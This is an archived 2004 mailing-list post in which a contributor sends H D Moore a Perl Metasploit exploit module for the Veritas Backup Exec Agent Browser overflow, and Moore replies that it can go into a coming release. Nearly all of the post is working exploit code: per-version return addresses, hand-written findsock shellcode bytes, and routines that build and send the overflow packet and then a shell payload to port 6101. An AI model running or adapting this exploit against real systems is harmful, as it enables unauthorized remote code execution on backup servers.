Veritas Backup Exec Agent Browser Overflow
From: hdm at metasploit.com (H D Moore)
Date: Thu, 16 Dec 2004 15:14:14 -0600
Thanks! We should be able to include this in the 2.3 release (due out sometime early January). -HD On Thursday 16 December 2004 15:10, syscall wrote:
http://www.idefense.com/application/poi/display?id=169 exploit code for veritas buggy. ___________________________________ package Msf::Exploit::backupexec_ns; use base "Msf::Exploit"; use strict; use Pex::Text; # wot is this? my $advanced = { }; # infoz my $info = { 'Name' => 'Veritas Backup Exec Agent Browser Overflow', 'Authors' => [ 'Thor Doomen <syscall at inbox.lv>' ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32' ], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 6101], }, 'Payload' => { 'MinNops' => 0, 'MaxNops' => 0, 'Space' => 1024, 'BadChars' => '', }, 'Description' => Pex::Text::Freeform(qq{ Veritas overflow bug. }), 'Refs' => [ 'http://www.idefense.com/application/poi/display?id=169' ], 'Targets' => [ ['Veritas BE 9.1 ', 0x014476eb, 0x401150FF], # recv at bnetns.exe v9.1.4691.0 | esi at beclass.dll v9.1.4691.0 ['Veritas BE 8.5 ', 0x014308b9, 0x401138FF], # recv at bnetns.exe v8.50.3572 | esi at beclass.dll v8.50.3572 ], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; $self->PrintLine( "[*] Attempting to make exploit target " . $target->[0] ); my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ( $s->IsError ) { $self->PrintLine( '[*] Error creating socket: ' . $s->GetError ); return; } my $code = "\xfc" x 112; # findsock - recv!bnetns.exe (iat) my $read = "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" . "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" . 
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75" . "\xe1\xff\xd7"; substr( $read, 29, 4, pack( 'V', $target->[2] ) ); substr( $code, 2, length($read), $read ); substr( $code, 66, 4, pack( 'V', $target->[1] ) ); my $req = "\x02\x00\x32\x00\x20\x00" . $code . "\x00" . "1.1.1.1.1.1\x00" . "\xeb\x81"; $self->PrintLine( "[*] Sending attack of " . length($req) . " bytes..." ); $s->Send($req); $self->PrintLine("[*] Sending the shell code..."); # make socket flush $s->Send( "pPpP" x 128 ); $s->Send($shellcode); $self->PrintLine("[*] Wait for response..."); return; } Advertisement: Skoda Fabia auto bez pirmas iemaksas www.skoda.lv